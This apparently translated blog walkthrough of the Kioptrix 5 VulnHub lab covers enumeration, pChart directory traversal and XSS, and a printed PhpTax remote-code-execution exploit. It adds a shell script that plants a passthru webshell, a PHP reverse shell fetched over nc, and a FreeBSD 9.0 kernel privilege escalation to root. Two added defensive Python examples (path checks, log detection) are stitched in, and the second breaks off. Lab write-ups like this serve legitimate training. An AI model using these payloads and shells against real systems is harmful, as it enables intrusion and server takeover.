I want to try bug bounty hunting

I keep saying "tempest" when I mean "pentest"

I hope the effort I put in now pays off down the line. Misuse strictly prohibited.

vulnhub Kioptrix 5 (1.4) notes

kioptrix 5(1-4)

Without thinking, I did what I always do and attached the disk as IDE afterwards without creating a virtual disk, and the VM would not boot.
In addition to the originally distributed image (.vmdk), download *fix.zip.
Create the VM from the *.vbox included in *fix.zip, delete the storage that is already attached, and add the *.vmdk again as IDE.
Then, as shown in the image included in *fix.zip, enter ufs:/dev/ada0p2 at the "mountroot>" prompt that appears after starting the VM, and it boots.

pentest

Service enumeration

# nmap -p- 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 08:13 EDT
Nmap scan report for 10.10.10.8
Host is up (0.00067s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
8080/tcp open   http-proxy
MAC Address: 08:00:27:73:6F:80 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 117.95 seconds
# nmap -p22,80,8080 -sV -version-all 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 08:17 EDT
Nmap scan report for 10.10.10.8
Host is up (0.00072s latency).

PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 08:00:27:73:6F:80 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.64 seconds

nmap takes forever.

Points of interest

Details

Approaching via Apache on port 80

# nikto -h 10.10.10.8
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.8
+ Target Hostname:    10.10.10.8
+ Target Port:        80
+ Start Time:         2020-04-30 08:21:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server may leak inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 13:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ PHP/5.3.8 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ 8672 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2020-04-30 08:23:20 (GMT-4) (98 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# dirb http://10.10.10.8

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Apr 30 08:29:52 2020
URL_BASE: http://10.10.10.8/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.8/ ----
+ http://10.10.10.8/cgi-bin/ (CODE:403|SIZE:210)                               
+ http://10.10.10.8/index.html (CODE:200|SIZE:152)                             
                                                                               
-----------------
END_TIME: Thu Apr 30 08:30:18 2020
DOWNLOADED: 4612 - FOUND: 2

I have a feeling CVE-2002-0082 came up on Kioptrix 1 as well, but will it land here?
Apparently the Apache version does not match, so it will not.
There seems to be nothing for this Apache version either, and nothing for PHP, so I'm stuck...
Or so I thought, but looking at the source of index.html:

<html>
 <head>
  <!--
  <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
  -->
 </head>

 <body>
  <h1>It works!</h1>
 </body>
</html>

"pChart2.1.3/index.php"?
Let's access it.
Something that looks like an admin page shows up.

# searchsploit pChart 2.1
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
pChart 2.1.3 - Multiple Vulnerabilitie | exploits/php/webapps/31173.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
# cat /usr/share/exploitdb/exploits/php/webapps/31173.txt

# Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS
# Date: 2014-01-24
# Exploit Author: Balazs Makany
# Vendor Homepage: www.pchart.net
# Software Link: www.pchart.net/download
# Google Dork: intitle:"pChart 2.x - examples" intext:"2.1.3"
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A

[0] Summary:
PHP library pChart 2.1.3 (and possibly previous versions) by default
contains an examples folder, where the application is vulnerable to
Directory Traversal and Cross-Site Scripting (XSS).
It is plausible that custom built production code contains similar
problems if the usage of the library was copied from the examples.
The exploit author engaged the vendor before publicly disclosing the
vulnerability and consequently the vendor released an official fix
before the vulnerability was published.


[1] Directory Traversal:
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
The traversal is executed with the web server's privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server's configuration.
This problem may exists in the production code if the example code was
copied into the production environment.

Directory Traversal remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.


[2] Cross-Site Scripting (XSS):
"hxxp://localhost/examples/sandbox/script/session.php?<script>alert('XSS')</script>
This file uses multiple variables throughout the session, and most of
them are vulnerable to XSS attacks. Certain parameters are persistent
throughout the session and therefore persists until the user session
is active. The parameters are unfiltered.

Cross-Site Scripting remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.


[3] Disclosure timeline:
2014 January 16 - Vulnerability confirmed, vendor contacted
2014 January 17 - Vendor replied, responsible disclosure was orchestrated
2014 January 24 - Vendor was inquired about progress, vendor replied
and noted that the official patch is released.

There seem to be several issues, so let's try them.

Access "http://10.10.10.8/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd" from Firefox

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin

In Firefox, confirmed that the directory traversal above, http://10.10.10.8/pChart2.1.3/examples/sandbox/script/session.php?<script>alert('XSS')</script>, fires.
I can do directory traversal, but I don't know what to look at.
Come to think of it, dirb showed a directory returning 403, so let's look at something that might be doing the access control, like ".htaccess" or "httpd.conf".
".htaccess" does not seem to exist.
"/etc/httpd/conf/httpd.conf" is not there?
Not "/usr/local/apache2/conf/" either?
That reminds me, I think httpd.conf lives in a different place on each OS, and since this is FreeBSD it is probably somewhere else.
Reference for the guess: "FreeBSDでApacheのインストールと起動" - Qiita (a Qiita article on installing and starting Apache on FreeBSD)
Since this is Apache 2.2.x, I guessed "/usr/local/etc/apache22/httpd.conf".

Access "http://192.168.1.68/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf" in Firefox

#
# This is the main Apache HTTP server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See <URL:http://httpd.apache.org/docs/2.2> for detailed information.
# In particular, see 
# <URL:http://httpd.apache.org/docs/2.2/mod/directives.html>
# for a discussion of each configuration directive.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned.  
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/foo_log"
# with ServerRoot set to "/usr/local" will be interpreted by the
# server as "/usr/local//var/log/foo_log".

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# Do not add a slash at the end of the directory path.  If you point
# ServerRoot at a non-local disk, be sure to point the LockFile directive
# at a local disk.  If you wish to share the same ServerRoot for multiple
# httpd daemons, you will need to change at least LockFile and PidFile.
#
ServerRoot "/usr/local"

#
# Listen: Allows you to bind Apache to specific IP addresses and/or
# ports, instead of the default. See also the <VirtualHost>
# directive.
#
# Change this to Listen on specific IP addresses as shown below to 
# prevent Apache from glomming onto all bound IP addresses.
#
#Listen 12.34.56.78:80
Listen 80
Listen 8080
(snip)
# "/usr/local/www/apache22/cgi-bin" should be changed to whatever your ScriptAliased
# CGI directory exists, if you have that configured.
#
<Directory "/usr/local/www/apache22/cgi-bin">
    AllowOverride None
    Options None
    Order allow,deny
    Allow from all
</Directory>

(snip)

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>



</VirtualHost>


Include etc/apache22/Includes/*.conf

It was right there.
So httpd.conf really was doing the access control.
Port 8080 seems to be access-controlled too, but only "Mozilla4_browser" can get in?

# curl -XGET -H "User-Agent:Mozilla/4.0" 10.10.10.8:8080
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
<ul><li><a href="phptax/"> phptax/</a></li>
</ul>
</body></html>

phptax?

# searchsploit phptax
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)               | exploits/php/webapps/21833.rb
PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution            | exploits/php/webapps/25849.txt
phptax 0.8 - Remote Code Execution                                           | exploits/php/webapps/21665.txt
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

I don't want to use metasploit.
But I don't know the phptax version; try it on a gamble?
Looking into it, though, ver 0.8 seems to be the latest version?
If so the security is wide open, but I'll bet on it.
Try the newer one, 25849.txt.

# cat /usr/share/exploitdb/exploits/php//webapps/25849.txt 
#
#  ,--^----------,--------,-----,-------^--,
#  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
#  `+---------------------------^----------|
#    `\_,-------, _________________________|
#      / XXXXXX /`|     /
#     / XXXXXX /  `\   /
#    / XXXXXX /\______(
#   / XXXXXX /          
#  / XXXXXX /
# (________(            
#  `------'

# Exploit Title   : PhpTax File Manipulation(newvalue,field) Remote Code Execution
# Date            : 31 May 2013
# Exploit Author  : CWH Underground
# Site            : www.2600.in.th
# Vendor Homepage : http://phptax.sourceforge.net/
# Software Link   : http://sourceforge.net/projects/phptax/
# Version         : 0.8
# Tested on       : Window and Linux


#####################################################
#VULNERABILITY: FILE MANIPULATION TO REMOTE COMMAND EXECUTION
#####################################################

#index.php

#LINE 32: fwrite fwrite($zz, "$_GET['newvalue']"); 
#LINE 31: $zz = fopen("./data/$field", "w"); 
#LINE  2: $field = $_GET['field']; 

#####################################################
#DESCRIPTION
#####################################################

#An attacker might write to arbitrary files or inject arbitrary code into a file with this vulnerability. 
#User tainted data is used when creating the file name that will be opened or when creating the string that will be written to the file. 
#An attacker can try to write arbitrary PHP code in a PHP file allowing to fully compromise the server.


#####################################################
#EXPLOIT
#####################################################

<?php
 
$options = getopt('u:');
   
if(!isset($options['u']))
die("\n        Usage example: php exploit.php -u http://target.com/ \n"); 
   
$url     =  $options['u'];
$shell = "{$url}/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E";

$headers = array('User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
'Content-Type: text/plain');
   
echo "        [+] Submitting request to: {$options['u']}\n";
   
$handle = curl_init();
   
curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
   
$source = curl_exec($handle);
curl_close($handle);
   
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo "        [+] Exploit completed successfully!\n";
echo "        ______________________________________________\n\n        {$url}/data/rce.php?cmd=id\n";
}
else
{
die("        [+] Exploit was unsuccessful.\n");
}
    
?>  

################################################################################################################
# Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 
################################################################################################################

I thought it was just text, but it actually comes with an exploit.
So the exploit works because lines 2, 31 and 32 of "/phptax/index.php" have the problem.
Just to be safe, check "usr/local/apache22//phptax/index.php".

# curl -vI -XGET -H "User-Agent:Mozilla/4.0" 10.10.10.8:8080/phptax/index.php
*   Trying 10.10.10.8:8080...
* TCP_NODELAY set
* Connected to 10.10.10.8 (10.10.10.8) port 8080 (#0)
> GET /phptax/index.php HTTP/1.1
> Host: 10.10.10.8:8080
> Accept: */*
> User-Agent:Mozilla/4.0
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Date: Fri, 01 May 2020 03:44:35 GMT
Date: Fri, 01 May 2020 03:44:35 GMT
< Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
< X-Powered-By: PHP/5.3.8
X-Powered-By: PHP/5.3.8
< Transfer-Encoding: chunked
Transfer-Encoding: chunked
< Content-Type: text/html
Content-Type: text/html

< 
* Excess found: excess = 4131 url = /phptax/index.php (zero-length body)
* Connection #0 to host 10.10.10.8 left intact
Access "http://10.10.10.8/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/www/apache22/data2/phptax/index.php" in Firefox.
The file's location is known from httpd.conf.

<?php
$field=$_GET[field];
(snip)

   if ($_GET[newvalue]) {
       $zz=fopen("./data/$field","w");
       fwrite($zz,"$_GET[newvalue]");
       fclose($zz);
   }

(snip)
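Both bugs seen so far come down to missing path checks: pChart's examples/index.php hands the Script parameter to the filesystem as-is, and phptax's index.php opens ./data/$field for writing with a user-supplied name and body, inside a directory that Apache serves and PHP executes. The following is an added example in Python (not code from pChart, phptax, or the original post) of the server-side checks that would refuse the payloads shown on this page: confine a user-supplied path to a base directory, allowlist the field names phptax may write, and keep its data directory outside any document root. The directory layout follows the httpd.conf recovered above, but the PHPTAX_FIELDS allowlist and the /var/db/phptax location are assumptions made for the example.

```python
"""Path-confinement checks for the pChart traversal and the phptax write.

Added example in Python; it is not the PHP of either project. The checks are
pure string logic so they can be run against the page's payloads offline.
"""
import posixpath
from typing import Optional
from urllib.parse import unquote

# Constructed paths following the layout the httpd.conf on the page shows;
# they are assumptions for this example, not taken from a real install.
DOCROOT_80 = "/usr/local/www/apache22/data"
DOCROOT_8080 = "/usr/local/www/apache22/data2"
SERVED_ROOTS = (DOCROOT_80, DOCROOT_8080)
PCHART_SCRIPTS = posixpath.join(DOCROOT_80, "pChart2.1.3/examples")
PHPTAX_DATA_WEB = posixpath.join(DOCROOT_8080, "phptax/data")  # what index.php uses
PHPTAX_DATA_PRIVATE = "/var/db/phptax"                          # hypothetical safe location

# Hypothetical allowlist of the form fields phptax is expected to persist.
PHPTAX_FIELDS = frozenset({"f1040_line7", "f1040_line8a", "state"})


def resolve_under(base: str, user_path: str) -> Optional[str]:
    """Return the normalised path if user_path stays inside base, else None.

    URL-decode once, drop a leading slash so join() cannot discard base,
    normalise away ".." components, then require base to still be a prefix
    at a path-component boundary (commonpath, not a plain startswith).
    """
    decoded = unquote(user_path)
    candidate = posixpath.normpath(posixpath.join(base, decoded.lstrip("/")))
    if posixpath.commonpath([base, candidate]) != base:
        return None
    return candidate


def pchart_script_path(script_param: str) -> Optional[str]:
    """The check examples/index.php?Action=View&Script=... lacked in 2.1.3."""
    return resolve_under(PCHART_SCRIPTS, script_param)


def under_served_root(path: str) -> bool:
    """True if path lies inside a directory Apache serves (and PHP executes)."""
    return any(posixpath.commonpath([root, path]) == root for root in SERVED_ROOTS)


def phptax_write_target(field: str, data_dir: str) -> Optional[str]:
    """Hardened counterpart of fopen("./data/$field", "w") in phptax index.php.

    Returns None (refuse the write) when the field name is not allowlisted,
    when data_dir itself is web-served, or when the name would leave data_dir.
    The second condition is what turned a data write into rce.php on the page.
    """
    if field not in PHPTAX_FIELDS:
        return None
    if under_served_root(data_dir):
        return None
    return resolve_under(data_dir, field)


if __name__ == "__main__":
    # Payloads as they appear on the page, plus one constructed benign name.
    print(pchart_script_path("%2f..%2f..%2fetc/passwd"))      # None: rejected
    print(pchart_script_path("somechart.php"))                # allowed
    print(phptax_write_target("rce.php", PHPTAX_DATA_WEB))    # None: rejected
    print(phptax_write_target("state", PHPTAX_DATA_PRIVATE))  # /var/db/phptax/state
```

The decode happens exactly once before the check, which mirrors what the server does with the query string; a value like %252f that survives one decode is treated as a literal file name and not as a separator.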

So I just need to rework the exploit code following 25849.txt.

# cp /usr/share/exploitdb/exploits/php//webapps/25849.txt  phptax_exploit.php

When I tried to use this exploit it complained that it doesn't know curl_init(), so install it.

# php -v
PHP 7.3.15-3 (cli) (built: Feb 23 2020 07:15:44) ( NTS )
(snip)
# apt install php7.3-curl

Alright, will this work now?

# php phptax_exploit.php -u http://10.10.10.8:8080/phptax
(snip)
#####################################################
#EXPLOIT
#####################################################

        [+] Submitting request to: http://10.10.10.8:8080/phptax
        [+] Exploit was unsuccessful.

Yep. No good.
I have no idea anymore, so I'll rewrite it as a shell script.

#!/bin/sh
# ./phptax_exploit.sh

# phptax < ver 0.8 exploit

# vulncode in phptax/index.php
#     $field = $_GET['field']; in line 2
#     $zz = fopen("./data/$field", "w"); in line 31
#     fwrite fwrite($zz, "$_GET['newvalue']"); in line 32

target_site_to_phptax_index_path="$1" # example "http://10.10.10.8:8080/phptax"
remote_code="$2" # example "id"; URL-encode it! a space is "%20"
curl -vI -H "User-Agent:Mozilla/4.0" "${target_site_to_phptax_index_path}/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E"
printf '\n\n'
curl -H "User-Agent:Mozilla/4.0" "${target_site_to_phptax_index_path}/data/rce.php?cmd=${remote_code}"

Forgive me, I wrote it hastily.
For some reason I struggled with the reverse shell from here.
What finally worked was sending over a PHP reverse shell and executing it.

php-reverse-shell is available on Kali
# cp /usr/share/webshells/php/php-reverse-shell.php reverse.php


#### change this part
$VERSION = "1.0";
$ip = '10.10.10.3';  // CHANGE THIS
$port = 443;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
window 1
# nc -nlvp 8080 < reverse.php
window 2
# ./phptax_exploit.sh http://10.10.10.8:8080/phptax nc%2010.10.10.3%208080%20%3E%20reverse.php%20\&
window 1
# nc -nlvp 443
window 2
# curl -v -XGET -H "User-Agent:Mozilla/4.0" "http://10.10.10.8:8080/phptax/data/reverse.php"

Finally got a shell.

$ id
uid=80(www) gid=80(www) groups=80(www)
$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

Is there anything for FreeBSD 9.0?

# searchsploit FreeBSD 9.0
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation                       | exploits/freebsd/local/28718.c
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation                 | exploits/freebsd/local/26368.c
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

There's one that looks just right, so try "28718.c".

# cp /usr/share/exploitdb/exploits/freebsd/local/28718.c freebsd9.0_priv.c

This program complained about a missing trailing newline, so don't forget the newline.

victim
$ wget http://10.10.10.3/freebsd9.0_priv.c
wget: not found

Seriously?
Guess I'll transfer the file with nc again.

attacker
# nc -nlvp 8080 < freebsd9.0_priv.c
victim
$ cd /tmp
$ nc 10.10.10.3 8080 > priv.c
$ gcc priv.c
$ ./a.out
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)
$ cd /root  
$ ls
.cshrc
.history
.k5login
.login
.mysql_history
.profile
congrats.txt
folderMonitor.log
httpd-access.log
lazyClearLog.sh
monitor.py
ossec-alerts.log
$ cat congrats.txt
If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in 
mind, and not meant for the seasoned pentester. However this does not mean one 
can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks. 

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS 
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good...


loneferret
http://www.kioptrix.com


p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by
default it would've blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)

Hell yeah.
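The congrats.txt note suggests looking at how much noise this walkthrough left in httpd-access.log and ossec-alerts.log. As an added example (not part of the original post and not OSSEC-HIDS code), here is a small Python detector that parses Apache combined-format log lines, URL-decodes the request once, and flags the patterns this VM would have recorded: directory traversal, a reflected <script> payload, PHP code arriving in a query parameter, and calls to a dropped cmd= webshell, plus a per-client count of 404 responses that surfaces wordlist scanning such as the dirb run. The log lines are constructed to mirror the requests made on this page; the attacker IP, timestamps and user agents are made up.

```python
"""Detect the web attacks from this walkthrough in Apache combined logs.

Added example; the rules are a simplified stand-in for what a HIDS applies
to a web server's access log, not OSSEC's actual rule set.
"""
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import unquote

# Constructed log lines modelled on the page's requests: two dirb probes, the
# 403 on /cgi-bin/, the pChart traversal, the XSS check, the phptax write,
# the call to the dropped rce.php, and one benign request from another host.
SAMPLE_LOG = r"""
10.10.10.3 - - [30/Apr/2020:08:29:55 -0400] "GET /admin HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.10.10.3 - - [30/Apr/2020:08:29:55 -0400] "GET /backup HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.10.10.3 - - [30/Apr/2020:08:29:56 -0400] "GET /cgi-bin/ HTTP/1.1" 403 210 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.10.10.3 - - [30/Apr/2020:08:41:10 -0400] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 2105 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
10.10.10.3 - - [30/Apr/2020:08:42:02 -0400] "GET /pChart2.1.3/examples/sandbox/script/session.php?%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1" 200 1488 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
10.10.10.3 - - [01/May/2020:03:50:11 -0400] "GET /phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E HTTP/1.1" 200 4131 "-" "Mozilla/4.0"
10.10.10.3 - - [01/May/2020:03:50:15 -0400] "GET /phptax/data/rce.php?cmd=id HTTP/1.1" 200 45 "-" "Mozilla/4.0"
10.10.10.9 - - [01/May/2020:04:00:00 -0400] "GET /index.html HTTP/1.1" 200 152 "-" "curl/7.68.0"
"""

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each rule is matched against the URL-decoded request path and query.
RULES = [
    ("directory_traversal", re.compile(r"(^|[/\\])\.\.([/\\]|$)")),
    ("reflected_xss", re.compile(r"<\s*script\b|javascript:", re.I)),
    ("php_code_in_parameter", re.compile(r"<\?php|passthru\(|system\(|shell_exec\(", re.I)),
    ("webshell_command", re.compile(r"[?&]cmd=", re.I)),
]


def parse_log(text: str) -> List[Dict]:
    """Parse combined-format lines; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            e = m.groupdict()
            e["status"] = int(e["status"])
            entries.append(e)
    return entries


def classify(entry: Dict) -> List[str]:
    """Return the names of every rule the decoded request matches."""
    decoded = unquote(entry["path"])
    return [name for name, rx in RULES if rx.search(decoded)]


def analyse(text: str, min_not_found: int = 50) -> Dict:
    """Flag per-request attack indicators and clients with many 404s."""
    alerts = []
    not_found: Counter = Counter()
    for e in parse_log(text):
        tags = classify(e)
        if tags:
            alerts.append({"ip": e["ip"], "ts": e["ts"], "path": e["path"], "tags": tags})
        if e["status"] == 404:
            not_found[e["ip"]] += 1
    scanners = {ip: n for ip, n in not_found.items() if n >= min_not_found}
    return {"alerts": alerts, "scanners": scanners}


if __name__ == "__main__":
    # The threshold is lowered to 2 only because the sample has two 404s.
    result = analyse(SAMPLE_LOG, min_not_found=2)
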